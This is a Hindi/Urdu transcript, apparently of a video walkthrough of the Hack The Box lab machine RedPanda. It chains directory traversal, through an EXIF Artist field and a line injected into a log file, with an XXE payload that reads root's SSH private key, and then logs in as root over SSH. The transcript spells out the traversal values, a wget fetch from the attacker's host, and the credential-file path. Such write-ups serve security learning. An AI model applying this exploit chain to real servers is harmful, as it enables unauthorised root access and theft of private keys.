डायरेक्टरी रिवर्सल को एक्सप्लॉइट करेंगे और कोई एक दो तीन चार पाँच छः डॉट डॉट स्लैश के बाद स्लैश टेम्प के अंदर हमारी इमेज होगी। सो हम उस तरह अब इमेज भी इमेज और एक्सएमएल फाइल दोनों हमारी टेम्प की डायरेक्टरी में होगी और उसके थ्रू हम डायरेक्टरी रिवर्सल को एक्सप्लॉइट करते हुए एक्स एक्स ई अचीव करेंगे और हमें रूट की मिल जाएगी। अब बातें बहुत हो गई हैं, इसको प्रैक्टिकली करते हैं। हमें पहले एक इमेज चाहिए। हम ऐसा करते हैं कि यहाँ पे जो ये इमेज है इसी को ले लेते हैं। सेव इमेजेस, डॉक्यूमेंट्स, रेड पांडा, क्रैक डॉट जेपीईजी, सेव। अच्छा, अब अगर हम यहाँ पे जाके देखें, ये इमेज है हमारे पास एक्सिफ टूल ग्रेग डॉट जेपैग। सो अगर आप यहाँ पे देखें तो यहाँ पे एक आर्टिस्ट का वेरिएबल होना चाहिए। ये देखें, आर्टिस्ट में हमारे पास वुडन है, जो कि अल्टीमेटली जब ये इमेज प्रोसेस होगी तो स्लैश क्रेडिट स्लैश वुडन अंडरस्कोर क्रेडिट्स डॉट एक्सएमएल का पाथ बनेगा कंप्लीट। सो हम इस आर्टिस्ट के वैल्यू को चेंज करेंगे। आर्टिस्ट, आई होप कि सिंटैक्स यही हो इस कमांड का। सो यहाँ पे डॉट डॉट स्लैश टेम्प स्लैश एन जे एम और इसके आगे अंडरस्कोर क्रेडिट्स डॉट एक्सएमएल की अटैच होगी वैल्यू। सो हमें अल्टीमेटली एन जे एम अंडरस्कोर क्रेडिट्स डॉट एक्सएमएल की फ़ाइल चाहिए टेम्प की डायरेक्टरी के अंदर। सो यहाँ पे है हमारे पास इस फाइल का नाम ग्रेग वन इमेज फाइल अपडेटेड। इसे एक दफ़ा देख लेते हैं। सो ये रही हमारी वैल्यू आर्टिस्ट की, जहाँ पे हम डायरेक्टरी रिवर्सल परफॉर्म कर रहे हैं जब ये प्रोसेस होगी। काफ़ी काफ़ी इंटरेस्टिंग अटैक वेक्टर है, क्योंकि कहाँ से देख लें आप, एक डायरेक्टरी रिवर्सल का अटैक सर्वर के ऊपर होगा। और इनपुट सैनिटाइजेशन कितनी इम्पोर्टेंट होती है जहाँ से भी यूज़र इनपुट आ रहा है। सो अब हम जाएंगे सी डी टेम्प में। यहाँ पे हम फेच करेंगे, सबसे पहले इसको कॉपी कर लेते हैं क्योंकि इस स्ट्रक्चर की हो सकता है प्रॉबेबली हमें ज़रूरत पड़े और हमें यहाँ पे बाद में ना आना पड़े। ओके, ये रहा हमारे पास XML और सी डी टेम्प। यहाँ पे हम करेंगे wget http 10.10.14.13 8000 स्लैश greg डॉट jpeg। ठीक हो गया। अब हमें चाहिए एक XML की फ़ाइल जिसके अंदर हमारा पेलोड हो XXE का। सो उसको कहाँ से देखें? पेलोड ऑल द थिंग्स XXE। सो ट्री फाइल्स, ये रही हमारे पास इनकोडिंग। हम देख लेते हैं कि यहाँ पे कौन सी यूज़ हो रही है। उन्होंने मेंशन की हुई है इनकोडिंग UTF-8 है। सो क्या यहाँ पे हमारे पास UTF-8 का कोई पेलोड है? आइजो आइजो, नप, नॉट रियली। सो किसी एक को ट्राई कर लेते हैं वैसे। फिर दोबारा देख लेंगे। सो यहाँ पे हम बनाएंगे फाइल नैनो
एन जे एम अंडर स्कोर क्रेड्स डॉट एक्स एम एल। एन जे एम ऑथर है और अंडर स्कोर क्रेड्स डॉट एक्स एम एल वो फंक्शन जावा का कंकेटनेट कर रहा है फाइल को फेच करने के लिए। सो यहाँ पे हम ऐड करेंगे सबसे पहले इसको लोकली जो है एडिट कर लेते हैं। अच्छा, सो ये है हमारे पास आइजो और फाइल। अगर हम डायरेक्ट ही वो फेच करें एस एस एच की इंस्टेड, अब मुझे डायरेक्टरी याद नहीं है किस डायरेक्टरी में होती है, आई डॉट एस एस एच स्लैश आई डी अंडर स्कोर आर एस ए में भी फाइल रूट स्लैश डॉट एस एस एच स्लैश आई डी अंडर स्कोर आर एस ए। सो इसको कॉपी करेंगे और यहाँ पे पेस्ट करेंगे। होप सो ये वर्क करे। वैसे मैंने पिछले एक्सएमएल की कोई भी स्ट्रक्चर यहाँ पे फॉलो नहीं किया है इसका, अब पता नहीं इस पे ये वर्क करेगा कि नहीं, लेकिन ट्राई कर लेते हैं। अच्छा, तो अब हमें क्या करना है, अब हमारे पास इमेज भी है और हमारे पास एक्सएमएल फाइल भी है। अब हमने एक रिक्वेस्ट जनरेट करनी है जिसमें हम अ, अपनी जो यूआरआई है वो इस फाइल की दें, यानी कि greg डॉट एक्सएमएल की के ls greg डॉट jpeg की, सॉरी। सो रेड पांडा डॉट लॉग में जाएंगे, या यहाँ से पहले हम कर लेते हैं कुछ इस तरह। स्ट्रक्चर देख लेना चाहिए एक दफ़ा दोबारा से रेड पांडा डॉट लॉग का। सी डी ओ पी टी पांडा सर्च। ऑटो कंप्लीट क्यों नहीं हो रहा? ओ पी टी पांडा सर्च, ओके। अच्छा, सो यहाँ पे हमारे पास रेड पांडा डॉट लॉग है, अभी कोई वैल्यू है इसके अंदर? नहीं। सो यहाँ से हम एक और दफ़ा रिक्वेस्ट सेंड करते हैं और आप देखते हैं ये हमारे पास वैल्यू आ गई है। इसको कॉपी करते हैं, कंट्रोल शिफ्ट सी, और अब यहाँ पे अगर हम पेस्ट करें और यहाँ पे हमारी जो वैल्यू है जो कि स्टोर होगी वो होगी स्लैश डॉट डॉट स्लैश डॉट डॉट स्लैश डॉट डॉट स्लैश डॉट डॉट स्लैश 1 2 3 4 5 6, और यहाँ पे हमारा आएगा टेम्प स्लैश ग्रेग डॉट जेपैग। ये सारे डॉट डॉट स्लैश मैंने क्यों डाले, वही चीज़ जो मैंने कोड में दिखाई थी आपको कि जब इमेज ओपन होने से पहले वो एक पाथ बिल्ड कर रहा है कि यहाँ पे कहीं ये। सो इस सारे पाथ से बाहर आना, क्योंकि हमारी इमेज इस पाथ के ऊपर तो नहीं पड़ी हुई। सो यू आर आई में डॉट डॉट स्लैश पहले इससे बाहर, इससे सारे से बाहर आके टेम्प में हमारी इमेज पड़ी हुई है। सो अगेन यहाँ पे भी इनपुट सैनिटाइजेशन ना होने की वजह से डायरेक्टरी रिवर्सल को हम एक्सप्लॉइट कर रहे हैं। सो यहाँ पे अगर हम देखें तो लुक्स प्रेटी गुड। अब इसे कॉपी करेंगे और हम ऐड करेंगे रेड पांडा लॉग में इको सो रेड पांडा डॉट लॉग कैट रेड पांडा डॉट लॉग। सो ये रही हमारी वैल्यू, होपफुली इसे एग्जीक्यूट होना चाहिए। वही चीज़ होगी, ये लाइन फेच करेगा और इस लाइन के ऊपर में से जो इमेज होगी उसके यूआरआई के ऊपर जाके वो इस इमेज को ओपन करेगा, फिर इस इमेज के अंदर से आर्टिस्ट निकालेगा। आर्टिस्ट में डॉट डॉट स्लैश टेम्प स्लैश एनजीएम पड़ा हुआ है, और वो एक्सएमएल फाइल को ओपन करेगा और वहाँ पे हमारा एक्स एक्स ई का पेलोड है जिससे हमें
असूलन रूट की SSH कीज़ मिलनी चाहिए। सो देख लेते हैं एक दफ़ा। फ़िलहाल ये एग्जीक्यूट नहीं हुआ, एक दफ़ा देख लेते हैं। opt /opt slash पांडा सर्च था डायरेक्टरी का नाम, और हमारे पास है redpanda.log। यहाँ पे ये वैल्यू पड़ी हुई है और इसको एग्जीक्यूट होना चाहिए था। डॉक टाइप फू इसको XXE, तो दोबारा देखते हैं। नहीं, ओके सो क्यों नहीं हुआ? स्लैश डॉट डॉट स्लैश डॉट डॉट स्लैश 1 2 3 ग्रेक डॉट जेपेग मे बी कि हमारा जो अच्छा, अगर हम अपने पेलोड को उनके XXE ये XML फाइल के स्ट्रक्चर के मुताबिक रखें तो, क्योंकि इनकोडिंग का मसला हो सकता है, यहाँ पे हमारी इनकोडिंग डिफरेंट है जो मशीन पे यूज़ हो रही है, और पेलोड की इनकोडिंग डिफरेंट है। सो यहाँ पे हम XXE पेलोड को थोड़ा सा चेंज कर लेते हैं। सो इनकोडिंग और डॉक टाइप फू, इस सारे को ऐड कर लेते हैं यहाँ से लेके रूट डॉट SSH। आई होप कि इस पाथ में कोई मसला ना हो। एनीवेज यहाँ पे हम ऐड करेंगे अपना फू, सो दोबारा से XML फाइल को अपडेट करते हैं इसके साथ। ओके RM यहाँ पे ऐड किया। उम्मीद है इनकोडिंग अब सही है, उम्मीद है कि अब इसे एग्जीक्यूट होना चाहिए। ओके अब दोबारा से इको करेंगे। 1 मिनट, यहाँ पे हम ओके इसको इको करना है स्लैश opt पांडा सर्च। ओके यार ये ब्रेक क्यों कर जाता है? एनीवेज नम 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 नहीं, उधर जाना पड़ना है। ओके CD opt पांडा सर्च। ओके इको shift V redpanda.log। ओके grad.jpg है, यस cat redpanda.log। ओके ये फाइल आ गई है। अब हम देखते हैं स्लैश टेम्प के अंदर जो creds.xml है वो अपडेट हुई है कि नहीं। नॉट येट। क्या इशू हो सकता है?
इमेज drag डॉट jpeg। अच्छा, अगर हम यहाँ पे ये पाथ एंटर करें तो क्या हमारे पास ये फाइल शो हो रही है ब्राउज़र में? एरर पेज, डॉट डॉट स्लैश सारे रिमूव हो गए हैं ड्यू टू सम इनकोडिंग। शुक्र है, ये रही हमारी SSH की। टाइम ले रहा था पांडा डॉट लॉग, जब वो क्रॉन जब एग्जीक्यूट होगी, क्रॉन जब क्या जो प्रोसेस एग्जीक्यूट होगा तब ही उसने XXE ने एग्जीक्यूट होना था। एनीवेज, बेटर लेट देन नेवर। इस की को हम यूज़ करेंगे कॉपी और 600 रूट, और अब हम SSH रूट एट 10.10.11.170 माइनस आई है हमारे पास रूट डॉट टेम। यस। Why taking time? Finally, who am I? ओके, सो दैट्स दैट। काफ़ी मेरे ख्याल से अगर इस बॉक्स को आप इजी कहें, जो कि हैक द बॉक्स के ऊपर लेबल्ड एज इजी है, तो थोड़ी सी ज़्यादती होगी, क्योंकि इसमें काफ़ी ज़्यादा सोर्स कोड एनालिसिस इन्वॉल्व था और उसको सारा समझना और उससे कैसे डायरेक्टरी ट्रावर्सल को परफॉर्म किया और डायरेक्टरी ट्रावर्सल से फिर XXE को कैसे एक्सप्लॉइट किया। सो मीडियम लेवल बॉक्स था ये, इजी बिल्कुल भी नहीं था। आई होप यू एंजॉयड माय वीडियो और थैंक यू वेरी मच। अल्लाह हाफिज़।